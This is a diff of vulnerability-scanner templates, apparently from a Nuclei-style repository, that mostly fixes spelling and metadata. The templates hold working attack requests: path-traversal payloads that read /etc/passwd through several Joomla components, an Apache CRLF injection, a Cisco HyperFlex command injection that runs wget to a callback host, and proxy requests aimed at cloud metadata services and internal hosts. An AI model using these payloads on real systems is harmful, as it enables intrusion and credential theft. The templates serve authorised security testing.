      - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1491.yaml
+++ b/cves/2010/CVE-2010-1491.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12318
    - https://www.cvedetails.com/cve/CVE-2010-1491
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1491
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1494.yaml
+++ b/cves/2010/CVE-2010-1494.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12113
    - https://www.cvedetails.com/cve/CVE-2010-1494
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1494
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1495.yaml
+++ b/cves/2010/CVE-2010-1495.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component Matamko 1.01 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12286
    - https://www.cvedetails.com/cve/CVE-2010-1495
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1495
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2010/CVE-2010-1531.yaml
+++ b/cves/2010/CVE-2010-1531.yaml
@ -4,24 +4,25 @@ info:
  name: Joomla! Component redSHOP 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
-  description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12054
    - https://www.cvedetails.com/cve/CVE-2010-1531
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1531
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/14
--- a/cves/2016/CVE-2016-4975.yaml
+++ b/cves/2016/CVE-2016-4975.yaml
@ -2,10 +2,14 @@ id: CVE-2016-4975
 info:
  name: Apache mod_userdir CRLF injection
-  author: melbadry9,nadino,xElkomy,sullo
+  author: melbadry9,nadino,xElkomy
-  severity: low
+  severity: medium
  description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
  remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
  tags: crlf,generic,cves,cve2016,apache
  reference:
    - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975
    - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
@ -16,9 +20,9 @@ requests:
  - method: GET
    path:
      - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
        part: header
 # Enhanced by cs on 2022/02/14
--- a/cves/2021/CVE-2021-1497.yaml
+++ b/cves/2021/CVE-2021-1497.yaml
@ -1,9 +1,8 @@
 id: CVE-2021-1497
 info:
  name: Cisco HyperFlex HX Data Platform RCE
  description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
-  author: gy741,sullo
+  author: gy741
  severity: critical
  reference:
    - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
@ -19,7 +18,6 @@ info:
    cvss-score: 9.80
    cve-id: CVE-2021-1497
    cwe-id: CWE-78
 requests:
  - raw:
      - |
@ -27,23 +25,20 @@ requests:
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
      - |
        POST /auth HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"
 # Enhanced by cs on 2022/02/14
--- a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
+++ b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
@ -18,6 +18,7 @@ requests:
      - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
      - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
      - "{{BaseURL}}/phpmyadmin/setup/index.php"
      - "{{BaseURL}}/pma/setup/index.php"
    stop-at-first-match: true
    matchers-condition: and
--- a/misconfiguration/proxy/metadata-alibaba.yaml
+++ b/misconfiguration/proxy/metadata-alibaba.yaml
@ -1,19 +1,17 @@
 id: metadata-service-alibaba
 # This attack abuses a misconfigured proxy that allows access to the metadata
 # IP or a name which resolves to the IP. A standard proxy request is made to
-# the proxy using the full metadata URL, which the proxy will fulfull to its
+# the proxy using the full metadata URL, which the proxy will fulfill to its
-# own metadata sevice.
+# own metadata service.
 #
 # The proxy may also be vulnerable to host/port enumeration on localhost or
 # inside the private network.
 info:
  name: Alibaba Metadata Service Check
  author: sullo
  severity: critical
  description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure.
-  remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
+  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
  reference:
    - https://www.alibabacloud.com/help/doc-detail/108460.htm
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,21 +21,19 @@ info:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-441
 requests:
  - raw:
      - |+
        GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
        Host: {{hostval}}
    payloads:
      hostval:
        - alibaba.interact.sh
        - 100.100.100.200
    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "zone-id"
 # Enhanced by cs on 2022/02/14
--- a/misconfiguration/proxy/metadata-aws.yaml
+++ b/misconfiguration/proxy/metadata-aws.yaml
@ -1,19 +1,17 @@
 id: metadata-service-aws
 # This attack abuses a misconfigured proxy that allows access to the metadata
 # IP or a name which resolves to the IP. A standard proxy request is made to
-# the proxy using the full metadata URL, which the proxy will fulfull to its
+# the proxy using the full metadata URL, which the proxy will fulfill to its
-# own metadata sevice.
+# own metadata service.
 #
 # The proxy may also be vulnerable to host/port enumeration on localhost or
 # inside the private network.
 info:
  name: Amazon AWS Metadata Service Check
  author: sullo
  severity: critical
  description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2.
-  remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
+  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
  reference:
    - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,18 +21,15 @@ info:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-441
 requests:
  - raw:
      - |+
        GET http://{{hostval}}/latest/meta-data/ HTTP/1.1
        Host: {{hostval}}
    payloads:
      hostval:
        - aws.interact.sh
        - 169.254.169.254
    unsafe: true
    matchers:
      - type: word
@ -43,3 +38,4 @@ requests:
          - "public-ipv4"
          - "privateIp"
        condition: or
 # Enhanced by cs on 2022/02/14
--- a/misconfiguration/proxy/metadata-azure.yaml
+++ b/misconfiguration/proxy/metadata-azure.yaml
@ -1,19 +1,17 @@
 id: metadata-service-azure
 # This attack abuses a misconfigured proxy that allows access to the metadata
 # IP or a name which resolves to the IP. A standard proxy request is made to
-# the proxy using the full metadata URL, which the proxy will fulfull to its
+# the proxy using the full metadata URL, which the proxy will fulfill to its
-# own metadata sevice.
+# own metadata service.
 #
 # The proxy may also be vulnerable to host/port enumeration on localhost or
 # inside the private network.
 info:
  name: Microsoft Azure Cloud Metadata Service Check
  author: sullo
  severity: critical
  description: The Microsoft Azure cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
-  remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
+  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
  reference:
    - https://docs.microsoft.com/en-us/azure/virtual-machines/linux/instance-metadata-service?tabs=windows
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,19 +21,16 @@ info:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-441
 requests:
  - raw:
      - |+
        GET http://{{hostval}}/metadata/instance?api-version=2021-02-01 HTTP/1.1
        Host: {{hostval}}
        Metadata: true
    payloads:
      hostval:
        - aws.interact.sh
        - 169.254.169.254
    unsafe: true
    matchers:
      - type: word
@ -44,3 +39,4 @@ requests:
          - "osType"
          - "ipAddress"
        condition: and
 # Enhanced by cs on 2022/02/14
--- a/misconfiguration/proxy/metadata-digitalocean.yaml
+++ b/misconfiguration/proxy/metadata-digitalocean.yaml
@ -1,19 +1,17 @@
 id: metadata-service-digitalocean
 # This attack abuses a misconfigured proxy that allows access to the metadata
 # IP or a name which resolves to the IP. A standard proxy request is made to
-# the proxy using the full metadata URL, which the proxy will fulfull to its
+# the proxy using the full metadata URL, which the proxy will fulfill to its
-# own metadata sevice.
+# own metadata service.
 #
 # The proxy may also be vulnerable to host/port enumeration on localhost or
 # inside the private network.
 info:
  name: DigitalOcean Metadata Service Check
  author: sullo
  severity: critical
  description: The DigitalOcean host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
-  remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
+  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
  reference:
    - https://developers.digitalocean.com/documentation/metadata/
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,21 +21,19 @@ info:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-441
 requests:
  - raw:
      - |+
        GET http://{{hostval}}/metadata/v1.json HTTP/1.1
        Host: {{hostval}}
    payloads:
      hostval:
        - aws.interact.sh
        - 169.254.169.254
    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "droplet_id"
 # Enhanced by cs on 2022/02/14
--- a/misconfiguration/proxy/metadata-google.yaml
+++ b/misconfiguration/proxy/metadata-google.yaml
@ -1,19 +1,17 @@
 id: metadata-service-gcp
 # This attack abuses a misconfigured proxy that allows access to the metadata
 # IP or a name which resolves to the IP. A standard proxy request is made to
-# the proxy using the full metadata URL, which the proxy will fulfull to its
+# the proxy using the full metadata URL, which the proxy will fulfill to its
-# own metadata sevice.
+# own metadata service.
 #
 # The proxy may also be vulnerable to host/port enumeration on localhost or
 # inside the private network.
 info:
  name: Google GCP Metadata Service Check
  author: sullo
  severity: critical
  description: The Google cloud (GCP) host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
-  remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
+  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
  reference:
    - https://cloud.google.com/compute/docs/metadata/default-metadata-values
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,22 +21,20 @@ info:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-441
 requests:
  - raw:
      - |+
        GET http://{{hostval}}/computeMetadata/v1/project/ HTTP/1.1
        Host: {{hostval}}
        Metadata-Flavor: Google
    payloads:
      hostval:
        - aws.interact.sh
        - 169.254.169.254
    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "attributes/"
 # Enhanced by cs on 2022/02/14
--- a/misconfiguration/proxy/metadata-hetzner.yaml
+++ b/misconfiguration/proxy/metadata-hetzner.yaml
@ -1,19 +1,17 @@
 id: metadata-service-hetzner
 # This attack abuses a misconfigured proxy that allows access to the metadata
 # IP or a name which resolves to the IP. A standard proxy request is made to
-# the proxy using the full metadata URL, which the proxy will fulfull to its
+# the proxy using the full metadata URL, which the proxy will fulfill to its
-# own metadata sevice.
+# own metadata service.
 #
 # The proxy may also be vulnerable to host/port enumeration on localhost or
 # inside the private network.
 info:
  name: Hetzner Cloud Metadata Service Check
  author: sullo
  severity: critical
  description: The Hetzner Cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
-  remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
+  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
  reference:
    - https://docs.hetzner.cloud/#server-metadata
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,18 +21,15 @@ info:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-441
 requests:
  - raw:
      - |+
        GET http://{{hostval}}/v1/metadata/private-networks HTTP/1.1
        Host: {{hostval}}
    payloads:
      hostval:
        - aws.interact.sh
        - 169.254.169.254
    unsafe: true
    matchers:
      - type: word
@ -44,3 +39,4 @@ requests:
          - "local-ipv4:"
          - "instance-id:"
        condition: or
 # Enhanced by cs on 2022/02/14
--- a/misconfiguration/proxy/metadata-openstack.yaml
+++ b/misconfiguration/proxy/metadata-openstack.yaml
@ -1,5 +1,4 @@
 id: metadata-service-openstack
 # This attack abuses a misconfigured proxy that allows access to the metadata
 # IP or a name which resolves to the IP. A standard proxy request is made to
 # the proxy using the full metadata URL, which the proxy will fulfull to its
@ -7,33 +6,34 @@ id: metadata-service-openstack
 #
 # The proxy may also be vulnerable to host/port enumeration on localhost or
 # inside the private network.
 info:
  name: Openstack Metadata Service Check
  author: sullo
  severity: critical
  description: The Openstack host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
-  remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
+  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
  reference:
    - https://docs.openstack.org/nova/latest/admin/metadata-service.html
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
    - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
  tags: exposure,config,openstack,proxy,misconfig,metadata
-
+  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-441
 requests:
  - raw:
      - |+
        GET http://{{hostval}}/openstack/latest HTTP/1.1
        Host: {{hostval}}
    payloads:
      hostval:
        - aws.interact.sh
        - 169.254.169.254
    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "vendor_data.json"
 # Enhanced by cs on 2022/02/14
--- a/misconfiguration/proxy/metadata-oracle.yaml
+++ b/misconfiguration/proxy/metadata-oracle.yaml
@ -1,40 +1,40 @@
 id: metadata-service-oracle
 # This attack abuses a misconfigured proxy that allows access to the metadata
 # IP or a name which resolves to the IP. A standard proxy request is made to
-# the proxy using the full metadata URL, which the proxy will fulfull to its
+# the proxy using the full metadata URL, which the proxy will fulfill to its
-# own metadata sevice.
+# own metadata service.
 #
 # The proxy may also be vulnerable to host/port enumeration on localhost or
 # inside the private network.
 info:
  name: Oracle Cloud Metadata Service Check
  author: sullo
  severity: critical
  description: The Oracle cloud host is configured as a proxy which allows access to the instance metadata IMDSv1 service. This could allow significant access to the host/infrastructure.
-  remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
+  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
  reference:
    - https://docs.oracle.com/en-us/iaas/Content/Compute/Tasks/gettingmetadata.htm
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
    - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
  tags: exposure,config,oracle,proxy,misconfig,metadata
-
+  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-441
 requests:
  - raw:
      - |+
        GET http://{{hostval}}/opc/v1/instance HTTP/1.1
        Host: {{hostval}}
        Metadata: true
    payloads:
      hostval:
        - aws.interact.sh
        - 169.254.169.254
    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "availabilityDomain"
 # Enhanced by cs on 2022/02/14
--- a/misconfiguration/proxy/open-proxy-internal.yaml
+++ b/misconfiguration/proxy/open-proxy-internal.yaml
@ -1,12 +1,11 @@
 id: open-proxy-internal
 info:
  name: Open Proxy To Internal Network
  author: sullo
  severity: high
  tags: exposure,config,proxy,misconfig,fuzz
  description: The host is configured as a proxy which allows access to other hosts on the internal network.
-  remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports.
+  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports.
  reference:
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/
    - https://en.wikipedia.org/wiki/Open_proxy
@ -15,109 +14,83 @@ info:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-441
 requests:
  - raw:
      - |+
         GET / HTTP/1.1
         Host: {{Hostname}}
      - |+
        GET http://192.168.0.1/ HTTP/1.1
        Host: 192.168.0.1
      - |+
        GET https://192.168.0.1/ HTTP/1.1
        Host: 192.168.0.1
      - |+
        GET http://192.168.0.1:22/ HTTP/1.1
        Host: 192.168.0.1
      - |+
        GET http://192.168.1.1/ HTTP/1.1
        Host: 192.168.1.1
      - |+
        GET https://192.168.1.1/ HTTP/1.1
        Host: 192.168.1.1
      - |+
        GET http://192.168.1.1:22/ HTTP/1.1
        Host: 192.168.1.1
      - |+
        GET http://192.168.2.1/ HTTP/1.1
        Host: 192.168.2.1
      - |+
        GET https://192.168.2.1/ HTTP/1.1
        Host: 192.168.2.1
      - |+
        GET http://192.168.2.1:22/ HTTP/1.1
        Host: 192.168.2.1
      - |+
        GET http:/10.0.0.1/ HTTP/1.1
        Host: 10.0.0.1
      - |+
        GET https://10.0.0.1/ HTTP/1.1
        Host: 10.0.0.1
      - |+
        GET http://10.0.0.1:22/ HTTP/1.1
        Host: 10.0.0.1
      - |+
        GET http:/172.16.0.1/ HTTP/1.1
        Host: 172.16.0.1
      - |+
        GET https://172.16.0.1/ HTTP/1.1
        Host: 172.16.0.1
      - |+
        GET http://172.16.0.1:22/ HTTP/1.1
        Host: 172.16.0.1
      - |+
        GET http:/intranet/ HTTP/1.1
        Host: intranet
      - |+
        GET https://intranet/ HTTP/1.1
        Host: intranet
      - |+
        GET http://intranet:22/ HTTP/1.1
        Host: intranet
      - |+
        GET http:/mail/ HTTP/1.1
        Host: mail
      - |+
        GET https://mail/ HTTP/1.1
        Host: mail
      - |+
        GET http://mail:22/ HTTP/1.1
        Host: mail
      - |+
        GET http:/ntp/ HTTP/1.1
        Host: ntp
      - |+
        GET https://ntp/ HTTP/1.1
        Host: ntp
      - |+
        GET http://ntp:22/ HTTP/1.1
        Host: ntp
    unsafe: true
    matchers:
      - type: dsl
@ -134,3 +107,4 @@ requests:
          - (!contains(body_1, "ssh")) && (contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || contains(body_5, "ssh") || contains(body_6, "ssh") || contains(body_7, "ssh") || contains(body_8, "ssh") || contains(body_9, "ssh") || contains(body_10, "ssh") || contains(body_11, "ssh") || contains(body_12, "ssh") || contains(body_13, "ssh") || contains(body_14, "ssh") || contains(body_15, "ssh") || contains(body_16, "ssh") || contains(body_17, "ssh") || contains(body_18, "ssh") || contains(body_19, "ssh") || contains(body_20, "ssh") || contains(body_21, "ssh") || contains(body_22, "ssh") || contains(body_23, "ssh") || contains(body_24, "ssh")
          - (!contains(body_1, "SSH")) && (contains(body_2, "SSH") || contains(body_3, "SSH")) || contains(body_4, "SSH") || contains(body_5, "SSH") || contains(body_6, "SSH") || contains(body_7, "SSH") || contains(body_8, "SSH") || contains(body_9, "SSH") || contains(body_10, "SSH") || contains(body_11, "SSH") || contains(body_12, "SSH") || contains(body_13, "SSH") || contains(body_14, "SSH") || contains(body_15, "SSH") || contains(body_16, "SSH") || contains(body_17, "SSH") || contains(body_18, "SSH") || contains(body_19, "SSH") || contains(body_20, "SSH") || contains(body_21, "SSH") || contains(body_22, "SSH") || contains(body_23, "SSH")
        condition: or
 # Enhanced by cs on 2022/02/14
--- a/misconfiguration/proxy/open-proxy-localhost.yaml
+++ b/misconfiguration/proxy/open-proxy-localhost.yaml
@ -1,12 +1,11 @@
 id: open-proxy-http-portscan
 info:
  name: Open Proxy to Other Web Ports on Proxy's localhost Interface
  author: sullo
  severity: high
  tags: exposure,config,proxy,misconfig,fuzz
  description: The host is configured as a proxy which allows access to web ports on the host's internal interface.
-  remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports.
+  remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports.
  reference:
    - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/
    - https://en.wikipedia.org/wiki/Open_proxy
@ -15,33 +14,26 @@ info:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-441
 requests:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |+
        GET http://somethingthatdoesnotexist/ HTTP/1.1
        Host: somethingthatdoesnotexist
      - |+
        GET http://127.0.0.1/ HTTP/1.1
        Host: 127.0.0.1
      - |+
        GET https://127.0.0.1/ HTTP/1.1
        Host: 127.0.0.1
      - |+
        GET http://localhost/ HTTP/1.1
        Host: localhost
      - |+
        GET https://localhost/ HTTP/1.1
        Host: localhost
    unsafe: true
    req-condition: true
    stop-at-first-match: true
@ -59,3 +51,4 @@ requests:
          - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
          - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
          - (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works"))
 # Enhanced by cs on 2022/02/14